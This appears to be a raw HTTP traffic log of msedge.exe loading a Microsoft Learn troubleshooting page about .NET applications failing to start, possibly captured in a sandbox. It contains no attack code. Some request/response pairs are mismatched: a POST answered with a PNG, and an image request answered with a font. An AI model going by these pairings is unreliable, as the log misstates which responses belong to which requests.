report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=static"}]}{"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0SLUsZAAAAAAzmaciykciRJbMlrdBtIVnQU1TMDRFREdFMTkxNgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
x-content-type-options: nosniff
content-length: 33794
vary: Accept-Encoding
cache-control: max-age=17784566
expires: Sun, 05 May 2024 16:57:58 GMT
date: Thu, 12 Oct 2023 20:48:32 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/global/67a45209.deprecation.js

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /_themes/docs.theme/master/en-us/_themes/global/67a45209.deprecation.js HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 588
content-type: application/javascript
content-encoding: gzip
last-modified: Mon, 09 Oct 2023 21:01:25 GMT
etag: "0x8DBC90AE65B8137"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0VdIlZQAAAADOjHxJn07wSp01YEDyrYVbQlJVMzBFREdFMTExNAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
cache-control: public, max-age=438614
expires: Tue, 17 Oct 2023 22:38:46 GMT
date: Thu, 12 Oct 2023 20:48:32 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/scripts/f5d007b1.index-docs.js

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /_themes/docs.theme/master/en-us/_themes/scripts/f5d007b1.index-docs.js HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: application/javascript
content-length: 611993
content-encoding: gzip
etag: "0x8DBCAC928D6BE0E"
last-modified: Thu, 12 Oct 2023 02:15:52 GMT
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 20231012T021730Z-up30fm0yzp6thf1r3v66mdsbgs000000071g00000001ez79
accept-ranges: bytes
vary: Accept-Encoding
cache-control: public, max-age=538102
expires: Thu, 19 Oct 2023 02:16:54 GMT
date: Thu, 12 Oct 2023 20:48:32 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /static/third-party/MathJax/3.2.2/tex-mml-chtml.js HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://learn.microsoft.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: application/javascript
content-encoding: gzip
content-md5: LgDVHJjbszjoEFTyQOHesg==
last-modified: Wed, 20 Sep 2023 23:31:57 GMT
etag: 0x8DBBA31C829D526
x-ms-request-id: 46f6f1ff-601e-0013-232a-f2fdd8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
x-azure-ref-originshield: 0WKwVZQAAAAA3Esd26EFaSo+eaMvCT+R0QU1TMDRFREdFMTgwNgA0NGU4ZTUwNy00YmE1LTRiNzAtODcwYS0yODA4NDM4ZDZiMmI=
access-control-allow-origin: *
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}{"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=static"}]}{"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0WKwVZQAAAACZkpucdi9lQogXOsGBmhSBQlJVMzBFREdFMTExMAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
x-content-type-options: nosniff
content-length: 265844
vary: Accept-Encoding
cache-control: max-age=30311536
expires: Fri, 27 Sep 2024 16:40:48 GMT
date: Thu, 12 Oct 2023 20:48:32 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: image/png
content-length: 35005
etag: "0x8D8E3CB30F4C3E2"
last-modified: Wed, 10 Mar 2021 13:48:31 GMT
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 20230628T081959Z-kxtvra8dxd7c71tecefzzq90a000000001ng000000013q0b
accept-ranges: bytes
cache-control: public, max-age=1242
expires: Thu, 12 Oct 2023 21:09:15 GMT
date: Thu, 12 Oct 2023 20:48:33 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 15427
content-type: image/png
last-modified: Wed, 10 Mar 2021 13:48:40 GMT
etag: "0x8D8E3CB365AA10A"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0MlZTZAAAAAAwEAB12lP/S4ByhCc8+Y3mQU1TMDRFREdFMTgxNAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
cache-control: public, max-age=1753
expires: Thu, 12 Oct 2023 21:17:46 GMT
date: Thu, 12 Oct 2023 20:48:33 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/content-nav/MSDocsHeader-DotNet.json? HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 874
content-type: application/json
content-encoding: gzip
last-modified: Fri, 04 Aug 2023 16:48:26 GMT
etag: "0x8DB950A9F96B229"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0GGTRZAAAAADnHxz+yJAGRZvE4cn0SLgVQU1TMDRFREdFMTgxNwA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
cache-control: public, max-age=276
expires: Thu, 12 Oct 2023 20:53:10 GMT
date: Thu, 12 Oct 2023 20:48:34 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/dotnet/framework/toc.json

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/dotnet/framework/toc.json HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 6943
content-type: application/json
content-encoding: gzip
last-modified: Wed, 27 Sep 2023 23:31:55 GMT
etag: "0x8DBBFB1EFF5709E"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0ar4WZQAAAAAlJ4z8xhHwQqzM1ssQe8wqQlJVMzBFREdFMDcxNwA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
cache-control: public, max-age=552
expires: Thu, 12 Oct 2023 20:57:46 GMT
date: Thu, 12 Oct 2023 20:48:34 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/dotnet/breadcrumb/toc.json HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 4814
content-type: application/json
content-encoding: gzip
last-modified: Wed, 27 Sep 2023 23:32:01 GMT
etag: "0x8DBBFB1F37EB5B9"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 06r0WZQAAAACBkVeWAo5GQJjdukDu+Me6QU1TMDRFREdFMTkyMgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
cache-control: public, max-age=306
expires: Thu, 12 Oct 2023 20:53:40 GMT
date: Thu, 12 Oct 2023 20:48:34 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 13339
content-type: image/png
last-modified: Wed, 10 Mar 2021 13:48:35 GMT
etag: "0x8D8E3CB33C8B874"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0pnCMZAAAAADdTbBS7UHnRZ6AZnqhm94IQlJVMzBFREdFMTEyMAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
cache-control: public, max-age=1604
expires: Thu, 12 Oct 2023 21:15:18 GMT
date: Thu, 12 Oct 2023 20:48:34 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 18367
content-type: image/png
last-modified: Wed, 10 Mar 2021 13:48:36 GMT
etag: "0x8D8E3CB3429357A"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0ClBaZAAAAABIOmtgHPgtSLwjGUqaEPMqTE9OMjEyMDUwNzE3MDIxADcxNjg5MjBlLTlmNWItNGE2Mi1iMTZlLWQ1YmU2M2NlNjFlNw==
cache-control: public, max-age=378
expires: Thu, 12 Oct 2023 20:54:52 GMT
date: Thu, 12 Oct 2023 20:48:34 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/dotnet/framework/install/media/application-not-started/install-3-5.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 13842
content-type: image/png
last-modified: Wed, 10 Mar 2021 13:48:26 GMT
etag: "0x8D8E3CB2E2E71C7"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0nrhhZAAAAAC/rPHwMgTHTbFwczlS6ZH2RlJBMzFFREdFMDMwMwA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
cache-control: public, max-age=1676
expires: Thu, 12 Oct 2023 21:16:30 GMT
date: Thu, 12 Oct 2023 20:48:34 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/media/logos/logo_net.svg

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /media/logos/logo_net.svg HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 301

location: /en-us/media/logos/logo_net.svg
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0nlsoZQAAAAAHSrr9iVDoQa6XXUzuAuejQlJVMzBFREdFMTAxOQA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 0
cache-control: no-cache, no-store
expires: Thu, 12 Oct 2023 20:48:34 GMT
date: Thu, 12 Oct 2023 20:48:34 GMT
akamai-cache-status: Redirect from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
POST

https://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch

msedge.exe

Remote address:

104.85.2.139:443

Request

POST /api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch HTTP/2.0
host: learn.microsoft.com
content-length: 153
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=9025e668-1ac7-4b9a-b2c8-057a9a60d657
cookie: ai_session=bBAIDTPAtPr5G/Y6kxQBoP|1697143713604|1697143713604

Response

HTTP/2.0 200

content-length: 98901
content-type: image/png
last-modified: Tue, 03 Oct 2023 22:58:44 GMT
etag: "0x8DBC4644B8943D0"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0V6IdZQAAAAB7s2cY8y5kSIB96Wk7QQsgQlJVMzBFREdFMTExNgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
cache-control: public, max-age=1047
expires: Thu, 12 Oct 2023 21:06:02 GMT
date: Thu, 12 Oct 2023 20:48:35 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/media/event-banners/banner-ignite-2023-flatcolor.png?branch=live

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/media/event-banners/banner-ignite-2023-flatcolor.png?branch=live HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/fe274a7f.site-ltr.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=9025e668-1ac7-4b9a-b2c8-057a9a60d657
cookie: ai_session=bBAIDTPAtPr5G/Y6kxQBoP|1697143713604|1697143713604

Response

HTTP/2.0 200

content-length: 17956
content-type: font/woff2
last-modified: Mon, 09 Oct 2023 21:01:25 GMT
etag: "0x8DBC90AE6AC067F"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0VRAlZQAAAADjMj2EfUPIRqWVVf7OLJfkQlJVMzBFREdFMDcwOAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
cache-control: public, max-age=388913
expires: Tue, 17 Oct 2023 08:50:28 GMT
date: Thu, 12 Oct 2023 20:48:35 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/docons.28d69bd4.woff2

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /_themes/docs.theme/master/en-us/_themes/styles/docons.28d69bd4.woff2 HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://learn.microsoft.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/fe274a7f.site-ltr.css
accept-encoding: gzip, deflate, br
